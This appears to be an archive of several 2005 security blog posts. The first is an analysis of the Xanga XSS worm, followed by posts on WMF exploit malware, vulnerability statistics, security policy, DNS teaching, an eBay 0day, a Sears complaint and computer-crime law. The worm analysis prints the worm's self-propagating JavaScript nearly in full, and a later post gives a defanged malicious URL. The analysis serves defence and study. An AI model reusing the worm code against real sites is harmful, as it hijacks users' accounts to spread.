Following in the footsteps of fellow blog provider MySpace, Xanga.com appears to have been infected with some kind of worm that compromises the accounts of blog users and replaces content on the sites in order to replicate.

Infected sites can easily be recognized by the following text:

xangas admin owned you.

im a motha fuckin balleR, DG4L.
greets to phrea,camzero,majestic,dgs
“got steve case up on the phone, bitch this camo youve been owned.”
free cam0.

More information as I have it.

[UPDATE: As of 0714 UTC on 31 December, Xanga was apparently shut down in a bid to contain the infection. The shutdown lasted a few minutes, but I have confirmed that the worm is being removed from infected sites, and has been rendered inert by recent changes made on xanga.com. My analysis of the worm follows.]

Technical Overview

The worm consists of a simple HTML/script combination, and is highly primitive in nature. The worm propagates by using the XMLHTTP interface in some browsers to create worm-infected posts on the xanga weblogs of users who visit an infected site while signed in. This approach blurs the line between worm and old-style file infecting viruses. I’ll refer to it as a worm for clarity, since most of the literature on the recent MySpace attack uses the same term. Of particular note is that the worm is ‘dumb’ — it will repeatedly repost itself to previously-infected sites. The attack is extremely noisy, with each post carrying the malware’s obnoxious message.

Aside from the fact that such immature and badly-written messages as the one dropped by the worm would already stand out on most xanga blogs (that I care to read, anyway), the incessant reposting as the worm spread more than likely caused serious clogging. As a result, this worm’s life was extremely short. It is already over as you’re reading this analysis.

It appears upon further research that this worm was a variant of the similar Exodus worm that went quietly and unnoticed on December 19th. It was only in researching this outbreak that I saw the reports of Exodus. It appears that neither worm was written by a very skilled individual, as both strains are easily uprooted, browser-specific, badly-structured, trivially-decoded, and unnecessarily bloated. The worm is technically unimpressive (particularly vis-a-vis Exodus) and is a feat on par with the scores of VBSWG tweaks and edits following the infamous “Kournikova” worm outbreak of 2001.

Cleanup

Xanga.com have taken steps to render existing worm code inert (namely to prevent copycat code from spreading), so users can clean up the worm infection by simply entering their sites in Safe Mode and removing the worm’s infected posts.

Detailed Analysis / Code

The first section of the code can easily be identified as the portion responsible for producing the obscene message:

<h4 class="itemTitle">xangas admin owned you.</h4>im a motha fuckin balleR, DG4L.<br>greets to phrea,camzero,majestic,dgs<br>"got steve case up on the phone, bitch this camo youve been owned."<br>free cam0.

The active portion of the worm is contained entirely in a DIV tag. It has three attributes (ID, STYLE, and CODE):

<DIV id=wormy style="BACKGROUND: url(java
script:ev
al(document.all.wormy.code))" code="[virus body]"></DIV>

The ‘background’ CSS property is used to refer to a background image for an element. The worm appears to use white space to evade the trivial ‘ ‘ URL filter in place on xanga.com. The background image URL is resolved by the browser to:

eval(document.all.wormy.code)

This small section of code triggers the worm’s execution. Alert readers will notice that this construct is a product of non-standard functionality in Internet Explorer. It fails to run in Firefox, as I suspect it does in many other alternative browsers.

I received the worm in an inert format that had been apparently disinfected by run-time filtering on xanga.com’s web site that was added after the infection began. I’ve slightly altered the code to make it more readable and to reverse the effects of the filtering.

The worm has a global portion of its code, as well as seven sub-routines. The global portion simply builds the defacement message above before handing off control to main, the worm’s dispatch procedure.

var chr = find(document.body.innerHTML,'style=','HEIGHT');
var J;
var con='im a motha fuckin balleR, DG4L.<br>greets to phrea,camzero,majestic,dgs<br>'+chr+'got steve case up on the phone, bitch this camo youve been owned.'+chr+'<br>free cam0.';
var code;
main()

The code in main reconstructs the worm’s source code using DHTML properties (using its find subprocedure to perform a simple text pattern search) and then calls the httpSend procedure. It delivers three arguments to httpSend:
[1] = STRING '/private/xtools/xtoolspremium.aspx'
[2] = REFERENCE to 'postwormy'
[3] = STRING 'GET'

function main(){
code='<D'+'IV id=wormy style='+chr+'BACKGROUND: url(java\nscript:ev\nal(document.all.wo'+'rmy.code'+find(document.body.innerHTML,'wo'+'rmy.code','<NO'+'SCR'+'IPT>')+'<NO'+'SCR'+'IPT>'
J=getXMLObj();
httpSend('/pri'+'vate/xto'+'ols/xtool'+'spremiu'+'m.a'+'spx',postwormy,'GET');
}

function find(BF,BB,BC){
var R=BF.indexOf(BB)+BB.length;
var S=BF.indexOf(BC,R+1);
return BF.substring(R,S)
}

The httpSend procedure accepts four arguments. This results in the fourth argument being undefined. The httpSend routine sets a callback procedure and then transmits the request:

function httpSend(BH,BI,BJ,BK){
if(!J){
return false
}
J.onreadystatechange=BI;
J.open(BJ,BH,true);
if(BJ=='POST'){
J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
J.setRequestHeader('Content-Length',BK.length)
}
J.send(BK);
return true
}

The postwormy routine is called when the HTTP transaction is complete. Once this has taken place, the worm has retreived a copy of /private/xtoolspremium.aspx, which is the posting form for writing and editing blog entries on Xanga.com. This callback function does the “dirty work” of the worm’s propagation, crafting a POST request to create a new blog entry. Some parts of the request are taken from the page it just retreived:

function postwormy(){
if(J.readyState!=4){
return
}
var AU=J.responseText;
var AS=new Array();
AS['__EVENTTARGET']='';
AS['__EVENTARGUMENT']='';
AS['__VIEWSTATE']=find(AU,'name='+chr+'__VIEWSTATE'+chr+' value='+chr,chr);
AS['txtTitle']='xangas admin owned you.';
AS['xformatblock']='removeFormat';
AS['xfontsize']='removeFormat';
AS['xformatblock']='removeFormat';
AS['txtProfImageName']='';
AS['proftitle1']='';
AS['proftitle2']='';
AS['proftitle3']='';
AS['xztitle1']='';
AS['xztitle2']='';
AS['xzasin1']='';
AS['radAccess']='1';
AS['chkComments']='on';
AS['btnSubmit']='Submit';
AS['txtUserId']=find(AU,'name='+chr+'txtUserId'+chr+' type='+chr+'text'+chr+' value='+chr,chr);
AS['xbgcolor']='';
AS['txtAcc']='0';
AS['xbordercolor']='';
AS['xcontent']=con+code;
AS['xcopypost']='0';
AS['xmsgs']='1';
J=getXMLObj();
httpSend('/pri'+'vate/xto'+'ols/xtool'+'spremiu'+'m.a'+'spx',stop,'POST',paramsToString(AS))
}

The getXMLObj routine is a helper in both cases. It tries various methods of obtaining XMLHTTP objects that are associated with different browsers, in an attempt to avoid creating a browser dependency. The object it returns is then used to conduct the worm’s HTTP session:

function getXMLObj(){
var Z=false;
if(window.XMLHttpRequest){
try{
Z=new XMLHttpRequest()
}
catch(e){
Z=false
}
} else if(window.ActiveXObject){
try{
Z=new ActiveXObject('Msxml2.XMLHTTP')
}catch(e){
try{
Z=new ActiveXObject('Microsoft.XMLHTTP')
}
catch(e){
Z=false
}
}
}
return Z
}

The stop function called as a callback during the POST request is a mere stub. It has no real purpose.

function stop(){
return
}

The paramsToString function is used during the generation of the request body for the worm’s POST request. It functions as a very simplistic URL encoder. The author elected not to use regular expressions for the replacement, and as a result, the loop in this routine is far more intensive than necessary:

function paramsToString(AV){
var N=new String();
var O=0;
for(var P in AV){
if(O>0){
N+='&'
}
var Q=escape(AV[P]);
while(Q.indexOf('+')!=-1){
Q=Q.replace('+','%2B')
}
while(Q.indexOf('&')!=-1){
Q=Q.replace('&','%26')
}
N+=P+'='+Q;
O++
}
return N
}

The worm is quite simple, and even more simple to block: simple text-based matching and filtering on keywords in the worm code appears to have been used to thwart the worm. Indeed, this worm is not much of a “big picture” concern, but it could very well reflect where malware will go in the future. As technology becomes increasingly web-dependent, expect malware to adapt and to begin targeting web application platforms. We’ve seen it with worms like Santy, and we’ll see more of it in the days to come.

As 2005 comes to an end, we can look back and try to use that to guess what we would see in 2006 … but lets first summarize what we had:
1) Over 1500 new vulnerability groups (we call them ‘groups’ since we don’t split an SQL injection and its CSS counterpart into two advisories), which is up by roughly 300 comparing to last year.

2) An uproar in exploits (i.e. advisories with little technical details and the majority of it being a PoC or an actual exploit) from 150 to 295.

3) The number of Microsoft related advisories (not just MSXX-XXX) has jumped from 66 to 133, a little bit more than double.

4) IIS related vulnerabilities have declined from 13 to 8.

5) A decrease in the number of Apache related advisories from 23 to 11.

6) The busiest month was May, with over 170 new articles (roughly 6 articles per day, including the weekends).

So what will 2006 bring? my estimate is that we’ll see MORE vulnerabilities. Why? simply because as more software comes into the consumer market, it is more likely that people will find vulnerabilities in them.

As more Web based products emerge, the number of SQL, Directory Traversal, Cross Site Scripting and the like will become the majority of vulnerabilities, while Buffer Overflows and Format Strings becoming the minority.

The number of “Phishing” attacks will greatly increase, and become a lot more clever as the thieves get smarter and the methods become simpler. “Phishing” will also start utilizing more custom made Spyware and exploits, to try and make the victim believe that they are not being “Phished”.

A security group *must* know the value of the assets that they are protecting. Ideally, you determine this value *before* designing your security infrastructure. You cannot design an optimized security architecture without defining critical assets…yet, I see it happening all the time. Security gets worked in on the back end. That’s a problem.

Along a similar vein, Vulnerability scanners are a great tool if deployed at the correct time and used correctly. However, a vulnerability scanner cannot tell you the monetary worth of the system that it has just scanned. I’ve seen too many companies that crank up Nessus, run a scan of an entire /16 block, and then start remediating from the top of the report to the bottom. Again, that’s a problem.

So, how does that tie into CVSS? Well, CVSS is a system for assigning a numeric value to a specific flaw. There are a number of factors which go into determining this value; however, the end result is just a positive integer between 0 and 10. This information, coupled with the asset value, gives you a clearly defined list of remediation priority. Multiply the asset value with the CVSS ranking. Presto! You have a prioritized list to give to your Compliance team.

!Dmitry

(Updated 2005-12-28 16:09 GMT)

A browser orientated spyware/worm appears to be on the loose. It exploits a vulnerability in the WMF rendering of Windows based operating system to infect them.

The worm utilizes a malicious WMF located at “uni on seek. com/ d/t 1/ wmf_exp. htm” (note the extra spaces are here to avoid accidental infection).

The vulnerability being exploited appears to be related to MS05-53, but somehow fully patched system still get infected by this worm.

Most infections occur on Windows XP machines, but I am not sure that there is a reason why other OS won’t get infected.

According to VirusTotal, only one Antivirus/Spyware detection system was able to determine that its a Trojan.Downloader a few hours ago (around 9:00 GMT), while now most Antivirus/Spyware classify it as:

Antivirus Version Update Result
AntiVir 6.33.0.70 12.28.2005 TR/Dldr.WMF.Small
Avast 4.6.695.0 12.28.2005 Win32:Exdown
AVG 718 12.27.2005 no virus found
Avira 6.33.0.70 12.28.2005 TR/Dldr.WMF.Small
BitDefender 7.2 12.28.2005 Exploit.Win32.WMF-PFV
CAT-QuickHeal 8.00 12.28.2005 no virus found
ClamAV devel-20051108 12.26.2005 no virus found
DrWeb 4.33 12.28.2005 Exploit.MS05-053
eTrust-Iris 7.1.194.0 12.27.2005 no virus found
eTrust-Vet 12.4.1.0 12.28.2005 no virus found
Ewido 3.5 12.28.2005 Not-A-Virus.Exploit.Win32.Agent.r
Fortinet 2.54.0.0 12.28.2005 W32/WMF-exploit
F-Prot 3.16c 12.28.2005 no virus found
Ikarus 0.2.59.0 12.28.2005 no virus found
Kaspersky 4.0.2.24 12.28.2005 Trojan-Downloader.Win32.Agent.acd
McAfee 4661 12.28.2005 Exploit-WMF
NOD32v2 1.1342 12.28.2005 Win32/TrojanDownloader.Wmfex
Norman 5.70.10 12.28.2005 no virus found
Panda 8.02.00 12.28.2005 Exploit/Metafile
Sophos 4.01.0 12.28.2005 Troj/DownLdr-LW
Symantec 8.0 12.28.2005 Download.Trojan
TheHacker 5.9.1.063 12.28.2005 Exploit/WMF
UNA 1.83 12.28.2005 no virus found
VBA32 3.10.5 12.28.2005 no virus found

As can be seen Antivirus companies have now started detecting it, which should bring the infection rate down or at least stop from getting any worse.

I will try and update you on additional details as they appear.

Metasploit Exploit:
H D Moore has created an exploit from the WMF worm that utilizes the same techinque as the worm does to open a shell on a remote Windows XP system, the exploit is available from: http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metafile

As Gadi stated, ‘Looking at it from the other side, though, this comes to show some of the ill in our industry. People buying “products” to do security rather than incorporate products in their security strategy and infrastructure.’

He’s dead on the money. I had planned on blogging about this some time in the next month…but, since he brought it up The *art* of architecting secure networks seems to have gone the way of the dodo. Many current security tools seem to be fixing the SYMPTOM and ignoring the CAUSE. The cause of many of our woes is simply poor initial architecture. Period. You don’t need an application firewall if you’ve followed the guidelines for architecting good code. You don’t need an IPS to only allow X% of your traffic to flow to a certain service if you have correctly implemented traffic-shaping on your edge (or core) router. I could go on and on. Many “security” tools are just “Second chance” devices. You’ve incorrectly configured your edge router or never really had a clue how to configure it in the first place? That’s OK, put our “security device” (a router with a fancy GUI) in front of your servers and try it again. Good initial architecture falls into that 80/20 rule. It solves 80% of the problem in 20% (or less) of the time.

I’ve audited organizations which boasted 20 or 30 information security personnel. That’s a decent-sized group. And, when I get to asking them about their User education program, it’s not surprising to hear that they have maybe allocated one-half of a Full time Employee (FTE) to user education. User Education isn’t sexy, stimulating, or fun (usually). However, educating your users is part of COMMUNICATING your policy. You can’t expect people to go the speed limit if you don’t post signs letting them know what the speed limit is.

A well-educated populace can serve as a human IDS, alerting you to possible problems within your network. User education also highlights your security group as the enforcers of the rules. Cars tend to drive closer to the speed limit when they see a police car on the horizon. It’s the same with corporate information security. I try to reach each user at least 4 times a year. This isn’t necessarily a physical act. That is, you can reach your users through snail mail, posters, email, a recorded message, web meeting, interactive demo, a java security game, etc. Primary user education goals would include:

1) VISIBILITY - Simply put, let them know who you are.
2) ASSISTANCE - make the security group available to help the users (your clients, btw) be more secure and productive
3) REWARD - Reward users who have not only adhered to the policies but also helped to make the environment more secure
4) DELEGATE - Appoint a security liason. I choose one per remote location as well as one per business Unit.
5) ACCOUNTABILITY - Remind them of their responsibilities and the Security teams capabilities.
6) SOLICIT - Users aren’t passive participants in Security. Solicit their feedback and suggestions. What suggestions do they have for making the environment more secure? There should be a mechanism which allows *any* user to give feedback. Allow them to give this feedback anonymously, if they wish. You’ll be surprised at what you get.
7) WARN - Tell them what they should be on the lookout for (Phishing, email attachments, malicious sites, etc.)

I delegate 15% of my staff to User Education. It’s *that* important. We sponsor events, give away prizes, give yearly awards, maintain a 24×7 message board, etc. Your dedicated User Education staffers should be highly creative. Don’t tuck them off in a corner. Make yourselves visible and approachable, it’ll pay off in big ways.

!Dmitry

Cryptoogle is a new kind of encryption developed by the frozenbill, JaggedEdges or Gnome (whichever you know him by, it’s all the same person). Cryptoogle is designed to serve as an algorythm for securing data and putting a time-bomb on it. Whatever key you choose gets put through a Google query. Cryptoogle then assembles the results and uses this compilation as a key in a Blowfish cipher on whatever data you want to hide. The decrypter works exactly in reverse. This simple algorythm can protect your data far more than a normal cipher can.

Basically, the results returned by Google are used as a One Time Pad. But since the results found now, and in a few minutes/hours/days would be different, the original One Time Pad will be eventually lost. How effective is it? Very; this kind of Temporary One Time Pad seems to be quite secure, though its content is not very random. How long does it last? my tests varied depending on the Key used for the Google search, words like ‘google’, ‘microsoft’ lasted at least a few hours (they may still work now), while more common words like names of people lasted a few minutes.

BTW: I have seen more than once that the key didn’t work on one attempt, while it worked on another attempt… Google’s results appear to vary from request to request… could be that the Ads are affecting this as well?

Also I noted that writing a long sentence as the key, i.e. causing Google to return a single hit, was most effective in keeping the decryption working hours after the encryption took place.

(Thanks to WhiteAcid for pointing out this website)

This blog entry is not about Hollywood, but rather the universities. It is meant to be a short rant about the way that the academy is teaching students.

Lets start with few examples I encountered from a friend of mine, studying for his Computer Engineering degree on one of the “top” academic institutes in Israel, the Technion (similar to the American “MIT”).

Recently my friend was taught in class that every DNS resolve request must go through the root name servers.
As if that’s not bad enough by itself, they actually needed to write a PoC that display and prove the above situation.

But there is one problem. That’s not how DNS resolving works.
I enter www.securiteam.com more then once each day. So why would anyone think that I must go through a root name server? What about local DNS cache (on my own machine)? What about using my ISP to resolve securiteam.com so that when someone else makes that same request it will be locally cached?

In fact, most DNS resolve requests do not go to the root name servers, but rather go to the local ISP, local cache or sometimes even static local definitions such as the hosts file (that exists in both Unix/Linux, and on Microsoft Windows).

And another thing: if I choose to define that www.securiteam.com is actually www.google.com in the hosts file, then when I’ll try to access www.securiteam.com it will actually be resolved as www.google.com!

So where are the root DNS servers in this picture? Well, if I try to resolve a new domain that isn’t locally cached, and is not cached at my ISP’s, my ISP DNS will go to the root servers for me and return the results. Only in that case the request will actually go through root servers and even here I do not interact with them directly (I have no real way of knowing that my ISP did so instead of pulling it from its own cache).

So what happens to all those poor students who study the ‘textbook’ answer that has no real practical use?

Another thing that they have learned is that you can resolve an IP to all of its domain names.
That is only very partially true. There are many, many cases that an IP cannot be resolved to its domain name (if a reverse lookup is not available) and there is no way for me of knowing that for sure if a DNS out there didn’t define another domain name for that IP.

So the university tries to teach its students that we must access the root name servers to resolve DNS names, and that we can enumerate host names from IP’s as the basics of networking.
Next they will teach that the earth is flat, and that the dust ferry creates the electricity from dust created at the Everest peak.

I love the technical end of Security. Coming from a mathematical background, I crave that buzz that comes from proving a tough theorem. In Security, there is nothing that really matches the buzz of reversing a tough binary, or figuring out some undocumented protocol with nothing but blackbox fuzzers and a packet sniffer, or writing that fuzzer that generates an exception in some popular app. Security research is sexy, fun and stimulating. At the same time, it doesn’t often impact the bottom line (or goal) of a more secure network. It’s mental masturbation - fun, habit-forming, sometimes beautiful but meaningless shortly after complete.

Now, all of this uber-technical research leads to … well, it leads to uber-technical security tools. Cool tools - Star-Trek-Cool or Matrix-Cool. We have tools which mimic the human body and tell us when an anomaly occurs within a TCP session, or when a kernel call was followed by some other call which had not been modelled into the norm. We have tools which automatically shut down attacks based on some learned or programmed behavior. We have tools which exploit a flaw and then drop a shell, allowing the clueless user to initiate a second scan from the exploited machine. I could go on and on. We have a veritable CRAPLOAD of tools. We buy these tools, rush them home to our shiny network, deploy them, and at the end of the day there is no discernible increase or decrease in Security Posture. It doesn’t take a Phd in Statistics to tell us that the tools are (at best) a marginal help. They make us *feel* more secure without actually being more secure. Are the tools useless? Some of them are. Are the tools either used wrongly or used at the wrong time in the Security cycle? Many times, yes.

The problem is that the really useful security applications have already been discovered, marketed, and sold. Firewalls, vulnerability scanners and anti-virus are largely useful tools, but that market is already saturated. So, we get these over-engineered, marginally useful security tools. Many vendors would have us buy a tool for it’s technical aesthetic value. Many of these tools are breathtakingly spectacular, complex, and elegant. We, the geeks, gather around a console at SANS, blackhat, or some other show and catch a chubby watching all that arousing, binary pr0n. And, at times, I nearly succumb and buy the product just to reward the original thought and sheer beauty of the engineering. But, I won’t buy a jigsaw if I need a hammer and neither should you. Art is art and a tool is a tool and rarely the two shall meet. A tool should serve a purpose - a specific purpose relative to your infrastructure and policy.

FOCUS. Are you with me? The goal of a Security Professional should be to (here it comes) increase the level of security on the network. As I mentioned in a prior post, securing a network can be as simple as creating, communicating, and enforcing a specific corporate policy. Increased compliance implies an increase in my security posture. The tool(s) that I deploy will be designed to increase compliance with policies and standards.

!Dmitry

Hi there. My name is Dmitry. That’s not my real name, but that’s OK. I have more than 10 years of experience in IT Security. I’ve worked for or consulted with many, many large organizations. There are tons and tons of blogs that are dedicated to ‘Security Research’. These blogs, while technically very interesting (to the point of distraction, actually), don’t really help anyone get more secure. Or, if they do help, it’s the raw side of the 80/20 rule (i.e. teaching you to spend 80% of your time solving 20% of the problem). The purpose of my ‘blogging’ is simply to tell the truth about the current state of the Security Industry. Over the course of the next few months, I hope to enlighten at least a few readers into thinking about the difference between perceived security and actual security. So, without further ado:

Intro

I ignore XSS bugs. I also ignore most SQL Injection, HTML Injection, header-injection, directory traversal, file upload, and other flaws. In 6 years, the network that I protect has only had two (2) compromises. And, to put things in perspective, the network has 90,000 internal nodes and roughly 400 external IP addresses (DMZ addresses). My budget last year was roughly 3 Million dollars (not a lot, given a staff of 12-15 full timers as well as contractors and part-timers).

You might think that I have a ton of neat toys that keep us safe? Nope. In fact, I don’t have *any* gee-whiz technology. I shun them (more on that later). There is no IPS on my network. I don’t have any software which automatically quarantines worms or trojans. I’m not running host-based anomaly detection. In short, I don’t stay safe by spending millions of dollars on network security equipment and software.

So, maybe I have a crack staff of reverse engineers, TCP/IP ninjas, shellcoders, and vulnerability experts? Nope. The average employee age is 40+. Most of the Security personnel are older IT personnel culled from disparate groups (Mainframes, Rexx programmers, EDI, Sys Admins, HR, Corporate Security, etc.). In short, our technical expertise is probably considerably lower than most other (similar) groups.

Given all this, I’m still not surprised that we have better Security than most other Fortune 100 companies. What’s our ‘magic formula’? It’s easy. We have a strong POLICY and we effectively COMMUNICATE and ENFORCE the policy. This doesn’t mean that we’re policy whores, quoting ISO17799 like its the infallible word. We created a policy which matches our business drivers and infrastructure. Period. It works for us. It might not work for any other single company but it works for us. And, at the end of the day, RESULTS are worth a ton more than INTENTIONS.

In the weeks to come, I hope to enumerate on some “Computer Security Fallacies” ™…or, commonly accepted methodologies which are inherently prone to failure. To wrap up this Introduction, I’d like to say that if you don’t have a custom POLICY which has been COMMUNICATED and is being ENFORCED, go ahead and stop reading about that XSS flaw which affects maybe 20 users worldwide. Throw away that stack of vendor slicks. Stop sorting your IDS logs. You’re fussing over a scrape on the knee and ignorning a sucking chest wound.

!Dmitry

Here is what we know:
1) Item number 7203336538 appeared on eBay on the 7th of December 2005 (Thanks to OSVDB for taking the snapshot).

2) A few hours later, the item was removed from eBay.

3) On the 9th of December 2005, the seller of the item, fearwall, has decided to change his name to smk778.

4) On the 12th of December 2005, the same day the bid should have ended, the following post appeared on Full Disclosure, 2x 0day Microsoft Windows Excel.

What can we learn from this chronology? quite a bit, but most are speculations.

The eBay item might or might not be, but coincidence are too strong here, the same one as the one revealed several days later.

The smk778 (fearwall) person might or not be related to the heapoverflow team/forum, as there appears to be no relations between the two, person and group (heapoverflow).

I hope more information will come to light about this issue, hopefully also from users reading this post and shedding more light on the subject, but the chronology shown here shows a clear path between vulnerability described in an eBay item and the latter full disclosure of the (possibly) a 0day Excel vulnerability.

Sears Wins 2005 “Not My Job” Award
Or, Never Let Salespeople Try to Install Your Dryer

I, of course, miss my Reason-For-Being when I am away travelling, but
for some odd reason she misses me, as well, rather than being relieved
at not having me underfoot all the time.

So I was coming back from a teaching trip, and not only was it a back-
to-back set of two courses (one of which had been changed in mid-
trip), but, as she was starting up a load of laundry, the good old
washing machine starts making the “load of ball bearings” noise that
the repair people had been unable to diagnose. What’s worse, this
time around it starts making dripping sounds, and, sure enough, soon
there’s water running out from under the machine.

So, after some investigation and discussion, we decide to get a new
washer and dryer. And after more investigation, decide on some
machines.

(I have to point out that my Reason-For-Being is very careful about
the laundry, so much so that it is almost physically painful for her
to have to use someone else’s machines, and see the difference that
results from lesser attention to the details. Laundromat machines are
just not in the picture.)

One of the possible machines is Sears house brand, Kenmore, so we
toddle down to the local Sears. As luck would have it, we run into
the Excellent Sales Representative for 2004 in Major Appliances. We
discuss options, measure machines (the space is tight, so we don’t
just go on the stated sizes), and we buy a set of machines. And pay
extra for delivery and installation. We specify evening delivery, so
that Gloria, who has, let’s face it, good cause for not trusting me
with a washrag, can be there to ensure that, when the old machines are
removed, the floor and walls get a good scrubbing before the new ones
are put back in place.

We are told to disconnect the old washer from the taps ourselves, and
to buy ten feet of four inch metal dryer conduit. So we do that.

That was Sunday.

Tuesday night, dispatch tells us that we are on for 5 pm to 7 pm on
Wednesday night.

Wednesday afternoon, the delivery guys call. They are in the area,
and can they install the machines now, instead of tonight? As a
favour to Sears, we agree, even though it isn’t very convenient.

The delivery guys come. They complain about the dryer vent. They
create a leak in the tap when connecting the washer (which they
install first). Then they complain about the space, and refuse to
install the dryer. And leave. Swearing. (They are swearing, not me.
Although my blood pressure is starting to get a little high.)

(Parenthetically, *everyone* I’ve told this story who has ever
installed a washer and dryer, professionally or otherwise, has said at
this point that you *always* install the dryer first, and then the
washer.)

I call the store. Can’t get our ESR for 2004. Another sales
representative snippily informs me that *she* always measures the
machines. (We had.) I call back, and finally get our ESR2K4. She
says that she has already called a service person, and we will be
getting a call in the morning between 8:30 am and 10:30 am to tell us
when he will be coming. Since this is exactly the time I am out most
days, I ask if she has given the service dispatch my cell phone
number. No, she hasn’t. Can she call them back and give them my cell
number, please? At this point, for some reason, she gets really
vague, but indicates that, no, she can’t.

I call the store back and ask to speak with the manager of major
appliances. The MMA is naturally appalled, and vows that a) we will
not have to pay for the delivery/installation fee, and b) we *will*
have working machines by the end of Thursday. He will also ensure
that the service person gets the cell number so that I’m properly
called.

Thursday morning I get a call from Sears. Not the service dispatch,
the delivery dispatch. Was I satisfied with the delivery service?
The delivery dispatch gets a bit of an earful. Delivery dispatch has
a series of questions, to most of which I have to answer “no.” As in,
no, the ESR2K4 did *not* provide us with the pamphlet that outlined
delivery and installation requirements. And so on. (As far as I’ve
been able to determine, nothing whatsoever results from this phone
conversation.)

Somewhat later I get a call from the service guy. He will be there
between 1 pm and 3:30 pm. So I stay home all afternoon. At 3:35 he
shows up. I’m a little concerned at this point, since I have to leave
at 4:30 myself. However, my concern was groundless. He looked at the
dryer vent and the dryer plug, announced that he was neither a vent
person not an electrician, and left.

I drive down to Sears. Fortunately for any sales reps that I might
have encountered, the first two people I see are the ESR2K4 and the
MMA. I outline the events of the day. They start asking questions
about the space, and I offer to let them look for themselves. They
decide to come. So I end up with the ESR2K4 and the MMA in my
kitchen, looking at the washer and dryer.

Then they try to fix it.

I tell you, the sight of an ESR in a slinky dress and strappy high
heels trying to crawl behind a dryer, and an MMA in a blue pinstripe
suit down on the floor looking up a dusty dryer vent pipe is one to
behold. Almost worth the money I was losing as a magazine and an
encyclopedia were waiting for articles and a lawyer in Dallas was
waiting for research. But not quite. Despite the attempt to show
that Sears staff goes that extra little bit, experience does tell: the
MMA mangled the dryer vent elbow fitting (and then complained that it
was no good anyway because it didn’t have the right bracket on the
end) and the ESR crushed the new dryer vent pipe. (The ESR, in
testing to see whether the dryer was working, didn’t bother to take
out the shoe drying shelf, and didn’t see any particular problem in
the crashes and thumps going on inside as the dryer turned.)

My Reason-For-Being found a competent handyman who came and installed
the dryer and fixed some problems with the installation of the washer.
The MMA agrees (I have, by now, memorized not only the phone number
for the Sears store, but also the process for getting through to the
right person, which isn’t easy) to take some money off so we can pay
the handyman, but then the ESR welshes on the deal and I have to make
multiple calls and visits to the store to get that straightened out.

Final score:

Sears: installation people who won’t install, service people who won’t
service, muddy bootprints all over the kitchen and dining room,
complaints and swearing, four and a half hours waiting for people to
show up when they said they would, three visits and four people on
site for an hour and 45 minutes, nine phone calls to the store, six
visits to the store, one untested and partially installed washer, and
a dryer in the middle of the kitchen.

Competent handyman: a little drywall dust, installed and tested dryer,
refit and re-leveled washer, thirty minutes.

copyright 2005, Robert M. Slade

I read an interesting post on Ido Kanner’s blog about the Egilman civil case. Egilman sued an individual after that individual accessed his web site using credentials of another user.

Rather than bringing his case under Title 18, Section 1030 (which governs “unauthorized access to a protected computer system”), Egilman chose to file his case under the Digital Millennium Copyright Act (DMCA) as an anti-circumvention violation. Egilman’s claim was that using a password without permission from the site owner amounted to “circumvention of a technological measure that effectively controls access to a work protected under this title [DMCA].”

The judge reviewing the case, of course, threw it out, finding no indication that an intent to circumvent existed. Rather than circumventing the protection, the defendant was simply complying with it. Egilman’s decision to pursue the case in this manner is indeed puzzling until one looks at the statute involved.

Title 18, Section 1030, offers three potential points of prosecution that would’ve been relevant to Egilman. Any person who commits any of the following actions is guilty of a felony under Section 1030:

(2) intentionally accesses a computer without authorization or exceeds authorized access, and thereby obtains—

[…]

Given the federal court’s jurisdiction over this issue, Egilman could reasonably have convinced a judge that the defendant obtained information from a protected computer without authorization in violation of paragraph 2, or that the defendant obtained something of value without authorization in violation of paragraph 4. A less-straightforward, but still plausible case could’ve been made for illegal trafficking of a password in violation of paragraph 6.

Instead, Egilman chose to label the misuse of the password to be circumvention of a protective measure intended to protect copyrighted works shielded from public access by the site’s simple password authentication system. Though the merits of password authentication are another debate for another day, the question I was asking at this point is why in the world Egilman chose to pursue the crime as a DMCA violation?

In this case, it appears Egilman chose this avenue of prosecution because the malicious user was actually authorized for the purposes of Section 1030.

For many sites, a mere username and password pairing authorizes you to access protected portions of a site’s content. Some blog hosts, for instance, require nothing more than a valid e-mail address to setup an account, after which a simple username and password suffices for access to that account. Many content providers include no mention (not even in their lengthy Terms of Use agreements, that nobody reads but me) that using an account you did not create is an unauthorized use of the services that site provides.

In such cases, unauthorized means of obtaining a password (exploitation of software flaws, brute-force cracking attempts, etc.) are obviously illegal under Section 1030. The more murky legal territory surrounds cases where an attacker possesses a valid (authorized) set of credentials via some other means, in spite of not being the authorized user. This could even include cases where the attacker was informed of the credentials by a user who had obtained them illegally. This is true because Section 1030 requires an attacker to “intentionally access a computer without authorization or exceed authorized access” or to “knowingly access a protected computer without authorization” before a crime has been committed. Computer crime laws in most other nations have similar standards of criminal conduct (i.e., the prosecuting plaintiff must prove intent).

In the case of someone who had illegally acquired a password revealing it to an attacker-to-be, the leaker would face conviction under paragraph six (language that is, again, modeled in most of the developed world), but the attacker who used the stolen password could conceivably argue ignorance by claiming that he/she had no idea the access was unauthorized.

Further, a defendant charged under paragraph six could make a compelling argument that because accessing an account created by another user is not unauthorized according to the TOU (provided the credentials are otherwise lawfully obtained — an exercise to the reader) a crime has not been committed.

As a security professional, I understand that access to be unauthorized, as do most in this field. However, the legal system doesn’t provide the grounds to prosecute an offender based solely on that assertion. That means a user who willingly reveals credentials may expose himself/herself to damage and you to lost hours, without leaving you any legal recourse. In a world where people still cough up the goods to random strangers in return for candy bars and coffee, that’s an unacceptably high risk.

But don’t panic… the legal system doesn’t force you to accept the costs of moronic users. It only offers you the opportunity to do so if you don’t cover all your bases. The solution to this potential legal pitfall (and the way to avoid being caught in Egilman’s situation) is to ensure that all users who could potentially be asked to authenticate themselves are aware that using credentials to log in is a testimony by the user to be the owner of the account they correspond to as well as the credentials themselves. It won’t deter criminals, just make them easier to nab if they strike.

At the very least, Terms of Use agreements should be updated to include terms similar to the following:

You agree that you will not disclose your [insert site] account name or password to anyone under any circumstances. You agree to notify [insert site] as expeditiously as possible if you believe that your account details have been compromised. Willful disclosure of account information to a third party may result in the termination of your account at our discretion.

Use of [insert site] user identities not created by you for your personal use is not authorized by [insert site] and is a violation of these terms of use.

This absolves sites of the responsibility to deal with passwords that have been disclosed voluntarily (stolen passwords are another story) by defining that to be prohibited conduct in violation of the TOU. Further, a TOU agreement amended in this fashion also defines use of another user’s credentials to be a violation of the TOU, and specifically unauthorized.

Problem solved, right? Wrong.

